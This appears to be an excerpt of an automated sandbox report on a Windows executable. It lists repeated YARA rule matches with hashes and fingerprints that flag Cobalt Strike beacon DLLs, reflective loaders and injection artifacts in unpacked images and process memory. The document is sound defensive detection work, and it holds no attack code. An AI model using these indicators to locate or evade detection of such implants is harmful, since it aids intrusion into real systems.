          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike payload, Author: ditekSHen
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON, Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Identifies CobaltStrike via unidentified function code, Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Rule for beacon reflective loader, Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Meterpreter Beacon - file K5om.dll, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects unmodified CobaltStrike beacon DLL, Author: yara@s3c.za.net
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Cobalt Strike sample from Leviathan report, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Cobalt Strike loader, Author: @VK_Intel
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike payload, Author: ditekSHen
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPE, Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON, Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies CobaltStrike via unidentified function code, Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPE, Matched rule: Rule for beacon reflective loader, Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects unmodified CobaltStrike beacon DLL, Author: yara@s3c.za.net
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON, Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: Identifies CobaltStrike via unidentified function code, Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: Rule for beacon reflective loader, Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: Detects Meterpreter Beacon - file K5om.dll, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: Detects unmodified CobaltStrike beacon DLL, Author: yara@s3c.za.net
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: Detects Cobalt Strike sample from Leviathan report, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: Detects Cobalt Strike loader, Author: @VK_Intel
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike payload, Author: ditekSHen
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON, Author: unknown
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Identifies CobaltStrike via unidentified function code, Author: unknown
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Rule for beacon reflective loader, Author: unknown
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Meterpreter Beacon - file K5om.dll, Author: Florian Roth
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects unmodified CobaltStrike beacon DLL, Author: yara@s3c.za.net
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Cobalt Strike sample from Leviathan report, Author: Florian Roth
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Cobalt Strike loader, Author: @VK_Intel
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Author: Florian Roth
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: CobaltStrike payload, Author: ditekSHen
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON, Author: unknown
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Identifies CobaltStrike via unidentified function code, Author: unknown
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Rule for beacon reflective loader, Author: unknown
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Meterpreter Beacon - file K5om.dll, Author: Florian Roth
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects unmodified CobaltStrike beacon DLL, Author: yara@s3c.za.net
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Cobalt Strike sample from Leviathan report, Author: Florian Roth
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Cobalt Strike loader, Author: @VK_Intel
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Author: Florian Roth
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: CobaltStrike payload, Author: ditekSHen
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTR, Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON, Author: unknown
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTR, Matched rule: Detects unmodified CobaltStrike beacon DLL, Author: yara@s3c.za.net
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTR, Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Author: Florian Roth
          Source: C:\Users\user\Desktop\yZah650lHL.exe, Code function: 0_2_00692078 CreateProcessWithLogonW,0_2_00692078
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
